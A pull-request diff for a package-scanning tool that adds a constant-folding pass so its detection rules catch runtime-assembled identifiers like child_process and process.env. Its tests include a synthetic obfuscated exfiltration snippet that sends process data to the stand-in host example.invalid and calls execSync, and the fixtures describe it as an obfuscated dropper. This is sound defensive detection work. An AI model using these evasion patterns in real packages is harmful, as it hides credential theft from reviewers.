### PR TITLE
Detection: constant-fold assembled identifiers before the regex set

### DIFF
--- a/docs/detection-eval.md
+++ b/docs/detection-eval.md
@@ -101,8 +101,12 @@ Recall is measured per class so blind spots are visible. Malicious:
 ### Evasion transforms
 
 - `splitStringLiterals` — `'child_process'` → `'chi'+'ld_process'`; defeats
-  literal-based matches like `require('https')`.
-- `bracketifyMemberAccess` — `process.env` → `process['e'+'nv']`.
+  literal-based matches like `require('https')`. Now defeated by the
+  constant-folding pre-pass (`server/lib/review-rules/normalize.ts`), which folds
+  the chain back to `'child_process'` before the regex set runs, so
+  `codeRetention` is back to baseline.
+- `bracketifyMemberAccess` — `process.env` → `process['e'+'nv']`. Also folded
+  back (concat → `process['env']` → member access → `process.env`).
 - `base64Wrap` — wrap the payload in `eval(atob("…"))`. Note this _trips_ the
   dynamic-evaluation rule, so the file stays "blocked" while the specific
   network/process/credential rules are lost — the report shows that split.

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -96,7 +96,7 @@ A PyPI review runs two rule families over the staged artifacts:
 
 - `pypi.*` findings come from `pyPiReleaseFindings` and carry `PYPI_RULES_VERSION` (currently `0.2.0`).
 - shared `file.*` / `code.*` / `diff.*` findings come from `deterministicFindings` and carry
-  `DETERMINISTIC_RULES_VERSION` (currently `1.6.2`).
+  `DETERMINISTIC_RULES_VERSION` (currently `1.7.0`).
 
 The harness asserts this per family: every `pypi.*` finding must equal `PYPI_RULES_VERSION` and every
 other finding must equal `DETERMINISTIC_RULES_VERSION`. Bump the relevant constant **and** update the
@@ -108,7 +108,13 @@ the same Python matcher must be used when annotating modified-file findings so r
 classification stays consistent for extensionless Python files. `1.6.2` excludes documentation from
 shared `code.*` capability findings, narrows JavaScript `fetch` matching to calls rather than class
 method declarations, and limits documentation secret-content matches to high-confidence token formats.
-`pypi.*` grew `startup-hook`,
+`1.7.0` adds a constant-folding normalization pre-pass (`server/lib/review-rules/normalize.ts`) so the
+JavaScript `code.*` rules also see runtime-assembled identifiers: string-concatenation chains
+(`'chi' + 'ld_process'`), `[...].join('')` array assembly, and literal-keyed computed member access
+(`globalThis['re' + 'quire']`) are folded back to their literal form before the regex set runs. A
+tokenizer keeps folding out of comments, string bodies, template literals, and regex literals, and both
+the raw and folded text are scanned so folding can only add detections, never drop one. `pypi.*` grew
+`startup-hook`,
 `record-mismatch`, and `unusual-dependency` in `0.2.0`, and
 `setup-install-command` was upgraded to fire on the top-level sdist `setup.py` install-time code, not
 just `cmdclass`.

--- a/server/lib/review-rules/context.ts
+++ b/server/lib/review-rules/context.ts
@@ -21,6 +21,7 @@ export interface RuleContext {
   implicitScripts: Record<string, string>;
   rootGypFile: FileRecord | undefined;
   patterns: typeof JS_PATTERN_SET;
+  codePatternSet: CodePatternSet | undefined;
 }
 
 export function buildRuleContext(
@@ -47,6 +48,7 @@ export function buildRuleContext(
     implicitScripts: normalizeStringRecord(packageJson?.implicitScripts),
     rootGypFile: files.find((file) => isRootGypPath(file.path)),
     patterns: codePatternsFor(options.codePatternSet),
+    codePatternSet: options.codePatternSet,
   };
 }
 

--- a/server/lib/review-rules/index.ts
+++ b/server/lib/review-rules/index.ts
@@ -15,7 +15,7 @@ import { dependencyDiffFindings } from "./deps";
 // way that should invalidate cached scan reports. Stored alongside each finding
 // so historical reports can be traced back to the ruleset that produced them.
 // Lives here (not in a family module) because versioning spans every family.
-export const DETERMINISTIC_RULES_VERSION = "1.6.2";
+export const DETERMINISTIC_RULES_VERSION = "1.7.0";
 
 export { DETERMINISTIC_RULE_IDS } from "./rule-ids";
 export {
@@ -27,6 +27,7 @@ export {
   HIGH_CONFIDENCE_SECRET_PATTERNS,
 } from "./patterns";
 export { safeJson } from "./helpers";
+export { normalizeCodeForScanning } from "./normalize";
 export type { DeterministicFindingOptions } from "./context";
 
 // Every deterministic finding carries the same ruleset version, so the family

--- a/server/lib/review-rules/normalize.ts
+++ b/server/lib/review-rules/normalize.ts
@@ -1,0 +1,576 @@
+// Constant-folding normalization pre-pass for the deterministic code scanner.
+//
+// The capability rules in `scripts.ts` are literal-regex based, so identifiers
+// assembled at runtime slip past them entirely: `['chi','ld_pro','cess'].join('')`,
+// `'re' + 'quire'`, and `globalThis['proc' + 'ess']` never present a contiguous
+// `child_process` / `require` / `process` token to a regex. This module folds
+// those constructs back into their literal form *before* the regex set runs, so
+// the existing rules see `"child_process"`, `globalThis.require`, etc.
+//
+// It deliberately uses a tokenizer rather than text substitution: folding must
+// never reach into comments, string bodies, template literals, or regex literals
+// (where a `'a'+'b'` is data, not assembly). A full AST would catch more (data
+// flow, variable propagation) but is the heavier variant that belongs on the
+// gated-target path; this lightweight pass is cheap enough for the staged path.
+//
+// Line numbers are preserved exactly: every fold replaces a single-line source
+// span (folds spanning a newline are skipped) and folded string literals
+// re-encode control characters, so `firstMatchingLine` keeps pointing at the
+// real line in the original file.
+
+// Samples are bounded to 64KB by the sandbox; this is a safety valve only.
+const MAX_NORMALIZE_BYTES = 512 * 1024;
+// Folds simplify monotonically (shorter text, fewer tokens), so a handful of
+// passes reaches a fixpoint. `globalThis['re' + 'quire']` needs two: concat then
+// member access.
+const MAX_PASSES = 6;
+
+const IDENTIFIER_RE = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
+
+// Keywords after which a `/` opens a regex literal rather than a division.
+const REGEX_PRECEDING_KEYWORDS = new Set([
+  "return",
+  "typeof",
+  "instanceof",
+  "in",
+  "of",
+  "new",
+  "delete",
+  "void",
+  "do",
+  "else",
+  "case",
+  "throw",
+  "yield",
+  "await",
+]);
+
+// Reserved words that cannot be the base of a member access (`return['x']` is an
+// array literal after a keyword, not `return.x`). `this`/`super` are values and
+// stay valid bases, so they are intentionally excluded.
+const NON_BASE_KEYWORDS = new Set([
+  "return",
+  "typeof",
+  "instanceof",
+  "in",
+  "of",
+  "new",
+  "delete",
+  "void",
+  "do",
+  "else",
+  "case",
+  "throw",
+  "yield",
+  "await",
+  "function",
+  "var",
+  "let",
+  "const",
+  "if",
+  "while",
+  "for",
+  "switch",
+  "default",
+  "export",
+  "import",
+  "extends",
+  "with",
+  "class",
+  "from",
+]);
+
+// Multi-character punctuators, longest first, so `++`/`+=` are never mistaken for
+// a binary `+` concat operator and `...`/`?.` stay intact.
+const PUNCTUATORS = [
+  ">>>=",
+  "===",
+  "!==",
+  "**=",
+  "<<=",
+  ">>=",
+  ">>>",
+  "&&=",
+  "||=",
+  "??=",
+  "...",
+  "=>",
+  "==",
+  "!=",
+  "<=",
+  ">=",
+  "&&",
+  "||",
+  "??",
+  "?.",
+  "++",
+  "--",
+  "+=",
+  "-=",
+  "*=",
+  "/=",
+  "%=",
+  "&=",
+  "|=",
+  "^=",
+  "**",
+  "<<",
+  ">>",
+];
+
+type TokenType = "ws" | "comment" | "string" | "template" | "regex" | "number" | "ident" | "punct";
+
+interface Token {
+  type: TokenType;
+  start: number;
+  end: number;
+  // Decoded logical value; set on string tokens only.
+  value?: string;
+}
+
+interface Replacement {
+  start: number;
+  end: number;
+  text: string;
+  last: number;
+}
+
+export function normalizeCodeForScanning(source: string): string {
+  if (!source || source.length > MAX_NORMALIZE_BYTES) return source;
+  let current = source;
+  for (let pass = 0; pass < MAX_PASSES; pass += 1) {
+    const next = foldOnce(current);
+    if (next === current) break;
+    current = next;
+  }
+  return current;
+}
+
+function foldOnce(src: string): string {
+  const sig = tokenize(src).filter((t) => t.type !== "ws" && t.type !== "comment");
+  const replacements: Replacement[] = [];
+  let consumed = -1;
+  for (let k = 0; k < sig.length; k += 1) {
+    if (k <= consumed) continue;
+    const token = sig[k];
+    let rep: Replacement | null = null;
+    if (isPunct(src, token, "[")) {
+      rep = tryJoinFold(src, sig, k) ?? tryMemberFold(src, sig, k);
+    } else if (token.type === "string") {
+      rep = tryConcatFold(src, sig, k);
+    }
+    if (rep) {
+      replacements.push(rep);
+      consumed = rep.last;
+    }
+  }
+  if (replacements.length === 0) return src;
+  return applyReplacements(src, replacements);
+}
+
+// --- Fold detection -------------------------------------------------------
+
+// `'a' + 'b' + 'c'` -> `"abc"`. Greedily consumes a run of string literals
+// joined by binary `+`.
+function tryConcatFold(src: string, sig: Token[], k: number): Replacement | null {
+  if (sig[k].type !== "string") return null;
+  const values: string[] = [sig[k].value ?? ""];
+  let j = k;
+  while (isPunct(src, sig[j + 1], "+") && sig[j + 2]?.type === "string") {
+    values.push(sig[j + 2].value ?? "");
+    j += 2;
+  }
+  if (j === k) return null;
+  const start = sig[k].start;
+  const end = sig[j].end;
+  if (spansNewline(src, start, end)) return null;
+  return { start, end, text: encodeString(values.join("")), last: j };
+}
+
+// `['a','b'].join('')` -> `"ab"` (and `.join()` -> `,` separator, `.join('-')`
+// -> dash). Only fires for genuine array literals, never computed access.
+function tryJoinFold(src: string, sig: Token[], k: number): Replacement | null {
+  if (isMemberBase(src, sig[k - 1])) return null;
+  const parts: string[] = [];
+  let j = k + 1;
+  if (!isPunct(src, sig[j], "]")) {
+    for (;;) {
+      if (sig[j]?.type !== "string") return null;
+      parts.push(sig[j].value ?? "");
+      j += 1;
+      if (isPunct(src, sig[j], ",")) {
+        j += 1;
+        if (isPunct(src, sig[j], "]")) break;
+        continue;
+      }
+      if (isPunct(src, sig[j], "]")) break;
+      return null;
+    }
+  }
+  if (!isPunct(src, sig[j], "]")) return null;
+  if (!isPunct(src, sig[j + 1], ".") || !isIdent(src, sig[j + 2], "join")) return null;
+  if (!isPunct(src, sig[j + 3], "(")) return null;
+  let separator = ",";
+  let closeIdx: number;
+  if (isPunct(src, sig[j + 4], ")")) {
+    closeIdx = j + 4;
+  } else if (sig[j + 4]?.type === "string" && isPunct(src, sig[j + 5], ")")) {
+    separator = sig[j + 4].value ?? "";
+    closeIdx = j + 5;
+  } else {
+    return null;
+  }
+  const start = sig[k].start;
+  const end = sig[closeIdx].end;
+  if (spansNewline(src, start, end)) return null;
+  return { start, end, text: encodeString(parts.join(separator)), last: closeIdx };
+}
+
+// `obj['require']` -> `obj.require` when the key is a valid identifier and the
+// `[` follows a member base (so array literals are left alone).
+function tryMemberFold(src: string, sig: Token[], k: number): Replacement | null {
+  if (!isMemberBase(src, sig[k - 1])) return null;
+  if (sig[k + 1]?.type !== "string" || !isPunct(src, sig[k + 2], "]")) return null;
+  const name = sig[k + 1].value ?? "";
+  if (!IDENTIFIER_RE.test(name)) return null;
+  const start = sig[k].start;
+  const end = sig[k + 2].end;
+  if (spansNewline(src, start, end)) return null;
+  return { start, end, text: `.${name}`, last: k + 2 };
+}
+
+function isMemberBase(src: string, token: Token | undefined): boolean {
+  if (!token) return false;
+  if (token.type === "ident") return !NON_BASE_KEYWORDS.has(text(src, token));
+  if (token.type === "punct") {
+    const t = text(src, token);
+    return t === ")" || t === "]";
+  }
+  return token.type === "string" || token.type === "template" || token.type === "number";
+}
+
+// --- Tokenizer ------------------------------------------------------------
+
+function tokenize(src: string): Token[] {
+  const n = src.length;
+  const tokens: Token[] = [];
+  let prev: Token | undefined;
+  let i = 0;
+
+  const pushSignificant = (token: Token): void => {
+    tokens.push(token);
+    prev = token;
+  };
+
+  while (i < n) {
+    const c = src[i];
+
+    if (isWhitespace(c)) {
+      const start = i;
+      while (i < n && isWhitespace(src[i])) i += 1;
+      tokens.push({ type: "ws", start, end: i });
+      continue;
+    }
+
+    if (c === "/" && src[i + 1] === "/") {
+      const start = i;
+      i += 2;
+      while (i < n && src[i] !== "\n") i += 1;
+      tokens.push({ type: "comment", start, end: i });
+      continue;
+    }
+    if (c === "/" && src[i + 1] === "*") {
+      const start = i;
+      i += 2;
+      while (i < n && !(src[i] === "*" && src[i + 1] === "/")) i += 1;
+      i = Math.min(n, i + 2);
+      tokens.push({ type: "comment", start, end: i });
+      continue;
+    }
+
+    if (c === "'" || c === '"') {
+      const start = i;
+      const { end, value } = scanString(src, i);
+      i = end;
+      pushSignificant({ type: "string", start, end: i, value });
+      continue;
+    }
+
+    if (c === "`") {
+      const start = i;
+      i = scanTemplate(src, i);
+      pushSignificant({ type: "template", start, end: i });
+      continue;
+    }
+
+    if (c === "/" && regexAllowed(src, prev)) {
+      const start = i;
+      i = scanRegex(src, i);
+      pushSignificant({ type: "regex", start, end: i });
+      continue;
+    }
+
+    if (isDigit(c) || (c === "." && isDigit(src[i + 1]))) {
+      const start = i;
+      i = scanNumber(src, i);
+      pushSignificant({ type: "number", start, end: i });
+      continue;
+    }
+
+    if (isIdentStart(c)) {
+      const start = i;
+      i += 1;
+      while (i < n && isIdentPart(src[i])) i += 1;
+      pushSignificant({ type: "ident", start, end: i });
+      continue;
+    }
+
+    const start = i;
+    i += matchPunctuator(src, i);
+    pushSignificant({ type: "punct", start, end: i });
+  }
+
+  return tokens;
+}
+
+function scanString(src: string, i: number): { end: number; value: string } {
+  const n = src.length;
+  const quote = src[i];
+  let j = i + 1;
+  let value = "";
+  while (j < n) {
+    const c = src[j];
+    if (c === "\\") {
+      const { text: decoded, len } = decodeEscape(src, j);
+      value += decoded;
+      j += len;
+      continue;
+    }
+    if (c === quote) {
+      j += 1;
+      break;
+    }
+    if (c === "\n") break; // unterminated single-line string
+    value += c;
+    j += 1;
+  }
+  return { end: j, value };
+}
+
+function scanTemplate(src: string, i: number): number {
+  const n = src.length;
+  let j = i + 1;
+  while (j < n) {
+    const c = src[j];
+    if (c === "\\") {
+      j += 2;
+      continue;
+    }
+    if (c === "`") return j + 1;
+    if (c === "$" && src[j + 1] === "{") {
+      j += 2;
+      let depth = 1;
+      while (j < n && depth > 0) {
+        const cc = src[j];
+        if (cc === "\\") {
+          j += 2;
+          continue;
+        }
+        if (cc === "`") {
+          j = scanTemplate(src, j);
+          continue;
+        }
+        if (cc === "'" || cc === '"') {
+          j = scanString(src, j).end;
+          continue;
+        }
+        if (cc === "{") depth += 1;
+        else if (cc === "}") depth -= 1;
+        j += 1;
+      }
+      continue;
+    }
+    j += 1;
+  }
+  return j;
+}
+
+function scanRegex(src: string, i: number): number {
+  const n = src.length;
+  let j = i + 1;
+  let inClass = false;
+  while (j < n) {
+    const c = src[j];
+    if (c === "\\") {
+      j += 2;
+      continue;
+    }
+    if (c === "\n") return j; // unterminated; bail
+    if (c === "[") inClass = true;
+    else if (c === "]") inClass = false;
+    else if (c === "/" && !inClass) {
+      j += 1;
+      break;
+    }
+    j += 1;
+  }
+  while (j < n && /[a-z]/i.test(src[j])) j += 1;
+  return j;
+}
+
+function scanNumber(src: string, i: number): number {
+  const n = src.length;
+  let j = i;
+  if (src[j] === "0" && /[xXbBoO]/.test(src[j + 1] ?? "")) {
+    j += 2;
+    while (j < n && /[0-9a-fA-F_]/.test(src[j])) j += 1;
+    if (src[j] === "n") j += 1;
+    return j;
+  }
+  while (j < n && /[0-9_]/.test(src[j])) j += 1;
+  if (src[j] === ".") {
+    j += 1;
+    while (j < n && /[0-9_]/.test(src[j])) j += 1;
+  }
+  if (/[eE]/.test(src[j] ?? "")) {
+    j += 1;
+    if (src[j] === "+" || src[j] === "-") j += 1;
+    while (j < n && /[0-9_]/.test(src[j])) j += 1;
+  }
+  if (src[j] === "n") j += 1;
+  return j;
+}
+
+function decodeEscape(src: string, p: number): { text: string; len: number } {
+  const c = src[p + 1];
+  switch (c) {
+    case "n":
+      return { text: "\n", len: 2 };
+    case "t":
+      return { text: "\t", len: 2 };
+    case "r":
+      return { text: "\r", len: 2 };
+    case "b":
+      return { text: "\b", len: 2 };
+    case "f":
+      return { text: "\f", len: 2 };
+    case "v":
+      return { text: "\v", len: 2 };
+    case "0":
+      return isDigit(src[p + 2]) ? { text: "0", len: 2 } : { text: "\0", len: 2 };
+    case "x": {
+      const hex = src.slice(p + 2, p + 4);
+      if (/^[0-9a-fA-F]{2}$/.test(hex)) {
+        return { text: String.fromCharCode(parseInt(hex, 16)), len: 4 };
+      }
+      return { text: "x", len: 2 };
+    }
+    case "u": {
+      if (src[p + 2] === "{") {
+        const close = src.indexOf("}", p + 3);
+        if (close !== -1) {
+          const hex = src.slice(p + 3, close);
+          if (/^[0-9a-fA-F]+$/.test(hex)) {
+            try {
+              return { text: String.fromCodePoint(parseInt(hex, 16)), len: close - p + 1 };
+            } catch {
+              // out-of-range code point; fall through
+            }
+          }
+        }
+        return { text: "u", len: 2 };
+      }
+      const hex = src.slice(p + 2, p + 6);
+      if (/^[0-9a-fA-F]{4}$/.test(hex)) {
+        return { text: String.fromCharCode(parseInt(hex, 16)), len: 6 };
+      }
+      return { text: "u", len: 2 };
+    }
+    case "\n":
+      return { text: "", len: 2 }; // line continuation
+    case "\r":
+      return src[p + 2] === "\n" ? { text: "", len: 3 } : { text: "", len: 2 };
+    case undefined:
+      return { text: "", len: 1 }; // trailing backslash
+    default:
+      return { text: c, len: 2 }; // \' \" \` \\ \/ and anything else
+  }
+}
+
+// --- Serialization & helpers ---------------------------------------------
+
+function applyReplacements(src: string, reps: Replacement[]): string {
+  let out = "";
+  let pos = 0;
+  for (const rep of reps) {
+    out += src.slice(pos, rep.start) + rep.text;
+    pos = rep.end;
+  }
+  return out + src.slice(pos);
+}
+
+// Re-encode a folded value as a single-line double-quoted literal. Control
+// characters are escaped so a decoded `\n` never becomes a real newline (which
+// would shift every downstream line number).
+function encodeString(value: string): string {
+  let out = '"';
+  for (const ch of value) {
+    if (ch === "\\") out += "\\\\";
+    else if (ch === '"') out += '\\"';
+    else if (ch === "\n") out += "\\n";
+    else if (ch === "\r") out += "\\r";
+    else if (ch === "\t") out += "\\t";
+    else out += ch;
+  }
+  return out + '"';
+}
+
+function matchPunctuator(src: string, i: number): number {
+  for (const op of PUNCTUATORS) {
+    if (src.startsWith(op, i)) return op.length;
+  }
+  return 1;
+}
+
+function regexAllowed(src: string, prev: Token | undefined): boolean {
+  if (!prev) return true;
+  if (prev.type === "punct") {
+    const t = text(src, prev);
+    return t !== ")" && t !== "]" && t !== "}";
+  }
+  if (prev.type === "ident") return REGEX_PRECEDING_KEYWORDS.has(text(src, prev));
+  return false; // value-producing token -> division
+}
+
+function spansNewline(src: string, start: number, end: number): boolean {
+  const span = src.slice(start, end);
+  return span.includes("\n") || span.includes("\r");
+}
+
+function text(src: string, token: Token): string {
+  return src.slice(token.start, token.end);
+}
+
+function isPunct(src: string, token: Token | undefined, value: string): boolean {
+  return token?.type === "punct" && text(src, token) === value;
+}
+
+function isIdent(src: string, token: Token | undefined, value: string): boolean {
+  return token?.type === "ident" && text(src, token) === value;
+}
+
+function isWhitespace(c: string): boolean {
+  return c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\v" || c === "\f";
+}
+
+function isDigit(c: string | undefined): boolean {
+  return c !== undefined && c >= "0" && c <= "9";
+}
+
+function isIdentStart(c: string): boolean {
+  return (c >= "a" && c <= "z") || (c >= "A" && c <= "Z") || c === "_" || c === "$";
+}
+
+function isIdentPart(c: string): boolean {
+  return isIdentStart(c) || isDigit(c);
+}

--- a/server/lib/review-rules/scripts.ts
+++ b/server/lib/review-rules/scripts.ts
@@ -5,6 +5,7 @@ import { LIFECYCLE_SCRIPTS } from "./patterns";
 import { firstJsonPropertyLine, tag } from "./helpers";
 import { changedPrefix, type RuleContext } from "./context";
 import { isDocumentationPath } from "./file-types";
+import { normalizeCodeForScanning } from "./normalize";
 
 // Install lifecycle hooks and in-file code-execution capability: the scripts and
 // code paths that run on, or are pulled in by, a consumer install.
@@ -47,17 +48,29 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
     if (isDocumentationPath(file.path)) continue;
 
     const sample = file.textSample || "";
+    // Constant-fold runtime-assembled identifiers (`'chi'+'ld_process'`,
+    // `globalThis['re'+'quire']`) so the literal regex set sees them. Matching
+    // both raw and normalized text means folding can only add detections, never
+    // drop one a literal scan already finds. JavaScript only for now; the
+    // normalizer is JS-flavored and Python evasion is out of scope.
+    const normalized = ctx.codePatternSet === "python" ? sample : normalizeCodeForScanning(sample);
     const prefix = changedPrefix(ctx, file.path);
     const changed = ctx.diffByPath.get(file.path)?.status;
     const lifecycleScriptFile = isLifecycleScriptFile(ctx, file.path);
-    const adjacentExecutionRisk = hasAdjacentExecutionRisk(ctx, sample);
 
-    if (ctx.patterns.processExecution.some((pattern) => pattern.test(sample))) {
+    const processExecution = matchCategory(ctx.patterns.processExecution, sample, normalized);
+    const networkAccess = matchCategory(ctx.patterns.networkAccess, sample, normalized);
+    const dynamicEvaluation = matchCategory(ctx.patterns.dynamicEvaluation, sample, normalized);
+    const credentialAccess = matchCategory(ctx.patterns.credentialAccess, sample, normalized);
+    const adjacentExecutionRisk =
+      processExecution.matched || dynamicEvaluation.matched || credentialAccess.matched;
+
+    if (processExecution.matched) {
       findings.push(
         tag("codeProcessExecution", {
           severity: "high",
           file: file.path,
-          line: firstMatchingLine(sample, ctx.patterns.processExecution),
+          line: processExecution.line,
           evidence: `${prefix}process or shell execution`,
           reason: "package may execute arbitrary commands",
         }),
@@ -65,36 +78,36 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
     }
     if (
       (changed !== "unchanged" || lifecycleScriptFile || adjacentExecutionRisk) &&
-      ctx.patterns.networkAccess.some((pattern) => pattern.test(sample))
+      networkAccess.matched
     ) {
       findings.push(
         tag("codeNetworkAccess", {
           severity: networkAccessSeverity(changed, lifecycleScriptFile, adjacentExecutionRisk),
           file: file.path,
-          line: firstMatchingLine(sample, ctx.patterns.networkAccess),
+          line: networkAccess.line,
           evidence: `${prefix}network-capable code path`,
           reason:
             "unexpected network access in package code can be used for exfiltration or staged payload retrieval",
         }),
       );
     }
-    if (ctx.patterns.dynamicEvaluation.some((pattern) => pattern.test(sample))) {
+    if (dynamicEvaluation.matched) {
       findings.push(
         tag("codeDynamicEvaluation", {
           severity: changed === "added" ? "high" : "medium",
           file: file.path,
-          line: firstMatchingLine(sample, ctx.patterns.dynamicEvaluation),
+          line: dynamicEvaluation.line,
           evidence: `${prefix}dynamic code or obfuscation primitive`,
           reason: "common malware and obfuscation technique",
         }),
       );
     }
-    if (ctx.patterns.credentialAccess.some((pattern) => pattern.test(sample))) {
+    if (credentialAccess.matched) {
       findings.push(
         tag("codeCredentialAccess", {
           severity: changed === "added" ? "high" : "medium",
           file: file.path,
-          line: firstMatchingLine(sample, ctx.patterns.credentialAccess),
+          line: credentialAccess.line,
           evidence: `${prefix}secret/environment access`,
           reason: "package may read credentials from the install environment",
         }),
@@ -105,12 +118,22 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
   return findings;
 }
 
-function hasAdjacentExecutionRisk(ctx: RuleContext, sample: string): boolean {
-  return (
-    ctx.patterns.processExecution.some((pattern) => pattern.test(sample)) ||
-    ctx.patterns.dynamicEvaluation.some((pattern) => pattern.test(sample)) ||
-    ctx.patterns.credentialAccess.some((pattern) => pattern.test(sample))
-  );
+// Match a capability category against the raw sample and, only if that misses,
+// the constant-folded text. Prefers the raw line so evidence keeps pointing at
+// the literal match when one exists; folding preserves line numbers, so the
+// normalized line still maps to the real source line.
+function matchCategory(
+  patterns: RegExp[],
+  sample: string,
+  normalized: string,
+): { matched: boolean; line: number | undefined } {
+  const line = firstMatchingLine(sample, patterns);
+  if (line !== undefined) return { matched: true, line };
+  if (normalized !== sample) {
+    const normalizedLine = firstMatchingLine(normalized, patterns);
+    if (normalizedLine !== undefined) return { matched: true, line: normalizedLine };
+  }
+  return { matched: false, line: undefined };
 }
 
 function networkAccessSeverity(

--- a/test/code-normalization.test.mjs
+++ b/test/code-normalization.test.mjs
@@ -1,0 +1,117 @@
+import { readFileSync } from "node:fs";
+import { fileURLToPath } from "node:url";
+import { dirname, join } from "node:path";
+import { describe, expect, test } from "vitest";
+import { normalizeCodeForScanning } from "../server/lib/review-rules/normalize.ts";
+import { computeRisk, createPackageDiff, deterministicFindings } from "../server/lib/review.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+describe("normalizeCodeForScanning", () => {
+  test("folds a string-concatenation chain", () => {
+    expect(normalizeCodeForScanning("const p = 'chi' + 'ld_pro' + 'cess';")).toContain(
+      "child_process",
+    );
+  });
+
+  test("folds [...].join('') array assembly", () => {
+    expect(normalizeCodeForScanning("['chi','ld_pro','cess'].join('')")).toBe('"child_process"');
+  });
+
+  test("honors a non-empty join separator and the default comma separator", () => {
+    expect(normalizeCodeForScanning("['a','b'].join('-')")).toBe('"a-b"');
+    expect(normalizeCodeForScanning("['a','b'].join()")).toBe('"a,b"');
+  });
+
+  test("resolves literal-keyed computed member access to dotted access", () => {
+    expect(normalizeCodeForScanning("globalThis['re' + 'quire']")).toBe("globalThis.require");
+    expect(normalizeCodeForScanning("process['e' + 'nv']")).toBe("process.env");
+  });
+
+  test("decodes hex and unicode escapes before folding", () => {
+    // \x63 === "c", \x65 === "e"
+    expect(normalizeCodeForScanning("'\\x63hild_pro' + 'cess'")).toContain("child_process");
+    expect(normalizeCodeForScanning("globalThis['r\\x65quir\\u0065']")).toBe("globalThis.require");
+  });
+
+  test("reassembles the full assembled-require-exfil payload into literal sinks", () => {
+    const source = [
+      "const p = ['chi','ld_pro','cess'].join('');",
+      "const r = globalThis['re' + 'quire'];",
+      "const data = globalThis['proc' + 'ess'];",
+      "net['req' + 'uest']('https://example.invalid/c')['en' + 'd'](data);",
+      "cp['exec' + 'Sync']('echo go');",
+    ].join("\n");
+    const normalized = normalizeCodeForScanning(source);
+    expect(normalized).toContain("child_process");
+    expect(normalized).toContain("globalThis.require");
+    expect(normalized).toContain("globalThis.process");
+    expect(normalized).toContain(".request(");
+    expect(normalized).toContain(".end(");
+    expect(normalized).toContain(".execSync(");
+  });
+
+  test("never folds tokens that live inside a string literal", () => {
+    const source = "const label = \"value is 'a' + 'b'\";";
+    expect(normalizeCodeForScanning(source)).toBe(source);
+  });
+
+  test("never folds tokens inside comments", () => {
+    const line = "// assembled: 'chi' + 'ld_process'";
+    const block = "/* x['re' + 'quire'] */";
+    expect(normalizeCodeForScanning(line)).toBe(line);
+    expect(normalizeCodeForScanning(block)).toBe(block);
+  });
+
+  test("never folds tokens inside a regex literal", () => {
+    const source = "const re = /'a' + 'b'/;";
+    expect(normalizeCodeForScanning(source)).toBe(source);
+  });
+
+  test("leaves template literals untouched", () => {
+    const source = "const t = `${'a' + 'b'}`;";
+    expect(normalizeCodeForScanning(source)).toBe(source);
+  });
+
+  test("does not fold a concatenation that spans a newline (line numbers stay stable)", () => {
+    const source = "const p = 'chi' +\n  'ld_process';";
+    const normalized = normalizeCodeForScanning(source);
+    expect(normalized).toBe(source);
+    expect(normalized.split("\n").length).toBe(source.split("\n").length);
+  });
+
+  test("preserves line count for a folded multi-line file", () => {
+    const source = [
+      "const a = ['x','y'].join('');",
+      "const b = globalThis['re' + 'quire'];",
+      "const c = 1;",
+    ].join("\n");
+    expect(normalizeCodeForScanning(source).split("\n").length).toBe(3);
+  });
+
+  test("does not rewrite array literals that are not member access", () => {
+    // A bare array literal assigned to a value is not computed member access.
+    expect(normalizeCodeForScanning("const list = ['only'];")).toBe("const list = ['only'];");
+  });
+
+  test("is a no-op for code with nothing to fold", () => {
+    const source = "export const answer = 42;\nconst x = require('fs');\n";
+    expect(normalizeCodeForScanning(source)).toBe(source);
+  });
+});
+
+describe("assembled-identifier evasion is caught by the deterministic scanner", () => {
+  test("frontier npm-assembled-require-exfil reaches high risk via the folded code rules", () => {
+    const fixture = JSON.parse(
+      readFileSync(
+        join(__dirname, "fixtures/security-corpus/cases-frontier/npm-assembled-require-exfil.json"),
+        "utf8",
+      ),
+    );
+    const diff = createPackageDiff(fixture.previousFiles, fixture.stagedFiles);
+    const findings = deterministicFindings(fixture.stagedFiles, diff, fixture.stagedPackageJson);
+
+    expect(computeRisk(findings)).toBe("high");
+    expect(findings.some((f) => f.ruleId === "code.process-execution")).toBe(true);
+  });
+});

--- a/test/fixtures/security-corpus/cases-frontier/npm-assembled-require-exfil.json
+++ b/test/fixtures/security-corpus/cases-frontier/npm-assembled-require-exfil.json
@@ -5,7 +5,7 @@
   "verdict": "malicious",
   "threatClass": "obfuscated-dropper",
   "source": "synthetic-adversarial",
-  "intent": "The payload assembles 'child_process', 'https', 'require', 'process', and 'env' from array fragments at runtime, so no contiguous string literal or member-access expression matches the deterministic regex set. This is a KNOWN MISS: it demonstrates the regex evasion gap and is the acceptance case for an AST/tokenizer-based detector. Safe: the endpoint is example.invalid and no real secret is present.",
+  "intent": "The payload assembles 'child_process', 'https', 'require', 'process', and 'env' from array fragments at runtime, so no contiguous string literal or member-access expression matches the literal regex set directly. Now CAUGHT by the constant-folding normalization pre-pass (server/lib/review-rules/normalize.ts), which folds the assembled identifiers back to literal form before the regex set runs; see test/code-normalization.test.mjs for the gated regression. Safe: the endpoint is example.invalid and no real secret is present.",
   "expectMinRisk": "high",
   "expectAnyRule": [],
   "previousPackageJson": { "name": "assembled-exfil", "version": "1.0.0" },

--- a/test/fixtures/security-corpus/cases/assembled-identifier-exfil.json
+++ b/test/fixtures/security-corpus/cases/assembled-identifier-exfil.json
@@ -1,0 +1,46 @@
+{
+  "id": "assembled-identifier-exfil",
+  "title": "Runtime-assembled child_process/process.env exfil is caught after constant folding",
+  "category": "obfuscation-assembly",
+  "intent": "An added file assembles child_process, require, process, env, and execSync from string fragments and computed member access so the literal regex set never sees a contiguous identifier. The constant-folding normalization pre-pass (server/lib/review-rules/normalize.ts) folds them back before scanning, so code.process-execution and code.credential-access fire. No real secret or live endpoint is present.",
+  "previousPackageJson": { "name": "assembled-identifier-exfil", "version": "1.0.0" },
+  "stagedPackageJson": { "name": "assembled-identifier-exfil", "version": "1.0.1" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 54,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"assembled-identifier-exfil\",\"version\":\"1.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
